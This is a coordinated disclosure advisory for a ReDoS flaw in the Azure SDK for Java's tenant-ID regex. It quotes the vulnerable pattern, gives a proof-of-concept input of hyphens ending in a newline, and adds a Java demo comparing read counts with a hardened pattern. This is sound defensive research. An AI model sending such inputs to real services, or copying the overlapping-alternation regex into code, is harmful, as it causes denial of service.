Coordinated Disclosure Timeline

Summary

The Azure SDK for Java up to version 1.5.0-beta2 is vulnerable to Regular Expression Denial of Service (ReDoS) in the way it validates tenant IDs. Specially crafted IDs cause catastrophic backtracking in the validation regex, so the time needed to evaluate them grows exponentially with their length.

Product

Azure SDK for Java

Tested Version

Details

Issue: Regular Expression Denial of Service (ReDoS) in ValidationUtil.java. (GHSL-2022-024)

The Azure SDK for Java provides the class ValidationUtil to perform validations on user-provided parameters. Its method validateTenantIdCharacterRange, used to validate tenant IDs, uses the following regular expression to do so:

private static final Pattern TENANT_IDENTIFIER_CHAR_PATTERN = Pattern.compile("^(?:[A-Z]|[0-9]|[a-z]|-|.)+$");

Note the alternation inside the repeated group (?:[A-Z]|[0-9]|[a-z]|-|.)+: the final, unescaped dot (.) matches any character except a line terminator, so it overlaps with every other alternative in the (non-capturing) group. Whenever the overall match fails, the engine has to backtrack exponentially [1], retrying every combination of which alternative (the dot or one of the others) consumed each character of the input.

As an example, the following snippet shows how an application could be attacked with a string of characters that each match two alternatives of the expression (here hyphens, which match both - and .), followed by a character that matches none of them (a newline, which . does not match by default). The time needed to complete the evaluation grows exponentially with the number of hyphens:

import com.azure.core.util.logging.ClientLogger;
import com.azure.identity.implementation.util.ValidationUtil;

public class RedosAzureSdkPoc {
    public static void main(String[] args) {
        try {
            // A run of hyphens (each matched by both '-' and '.') followed by a
            // newline that no alternative matches: forces exponential backtracking.
            ValidationUtil.validateTenantIdCharacterRange("------------------------------\n",
                    new ClientLogger(RedosAzureSdkPoc.class.getName()));
        } catch (IllegalArgumentException e) {
            // Thrown once the (slow) evaluation finally fails; the impact is the
            // time spent before this point, not the exception itself.
        }
    }
}

Note that JDK 9 introduced mitigations against this kind of catastrophic backtracking in java.util.regex, so to reproduce the issue with the above example the application using the Azure SDK must run on JDK 8 or earlier.
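The following is an added example (not part of the advisory or of the Azure SDK) that makes the backtracking visible without relying on wall-clock timing: it feeds the vulnerable pattern a CharSequence wrapper that counts how many times the regex engine reads a character, and compares it with a single-character-class pattern that has only one way to match each position. Because the dot in the original pattern is unescaped, that pattern in fact accepts any character except a line terminator; the hardened pattern below assumes the intended set was letters, digits, hyphen and a literal dot, which is an assumption of this example, not something the advisory states.

```java
import java.util.regex.Pattern;

public class TenantIdRegexCost {
    // Pattern quoted in the advisory: overlapping alternatives under a quantifier.
    static final Pattern VULNERABLE = Pattern.compile("^(?:[A-Z]|[0-9]|[a-z]|-|.)+$");

    // Hardened form (assumed intent, not the project's actual fix): one character
    // class, so each input position can be consumed in exactly one way and a
    // failing match cannot trigger exponential backtracking. Inside [] the dot is
    // a literal '.', unlike the unescaped '.' in the original alternation.
    static final Pattern HARDENED = Pattern.compile("^[A-Za-z0-9.-]+$");

    /** CharSequence that counts every charAt() call the matcher makes. */
    static final class CountingInput implements CharSequence {
        private final String s;
        long reads;

        CountingInput(String s) { this.s = s; }
        @Override public int length() { return s.length(); }
        @Override public char charAt(int i) { reads++; return s.charAt(i); }
        @Override public CharSequence subSequence(int a, int b) { return s.subSequence(a, b); }
        @Override public String toString() { return s; }
    }

    /** Number of character reads the engine needed to decide whether input matches p. */
    static long countReads(Pattern p, String input) {
        CountingInput in = new CountingInput(input);
        p.matcher(in).matches();
        return in.reads;
    }

    /** Constructed payload: n hyphens (match both '-' and '.') then a newline (matches nothing). */
    static String payload(int n) {
        StringBuilder sb = new StringBuilder(n + 1);
        for (int i = 0; i < n; i++) {
            sb.append('-');
        }
        return sb.append('\n').toString();
    }

    public static void main(String[] args) {
        System.out.println("hyphens  vulnerable-reads  hardened-reads");
        for (int n = 4; n <= 20; n += 4) {
            String s = payload(n);
            System.out.printf("%7d  %16d  %14d%n",
                    n, countReads(VULNERABLE, s), countReads(HARDENED, s));
        }
    }
}
```

On JDK 8 the vulnerable column grows exponentially (roughly doubling with every additional hyphen, since each hyphen can be attributed to either the - or the . alternative), while the hardened column grows linearly; on JDK 9 and later the mitigations mentioned above keep the vulnerable column far smaller, which is why the advisory's PoC needs JDK 8 to reproduce. Rewriting the pattern so that alternatives do not overlap is the usual remedy; the other is to evaluate untrusted input with a linear-time engine such as RE2/J [2] instead of java.util.regex.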

Impact

This issue may lead to denial of service of the application using the Azure SDK if user input reaches validateTenantIdCharacterRange.

Resources

[1] https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS
[2] https://github.com/google/re2j

Credit

This issue was discovered and reported by the CodeQL team members @atorralba (Tony Torralba) and @joefarebrother (Joseph Farebrother).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-024 in any communication regarding this issue.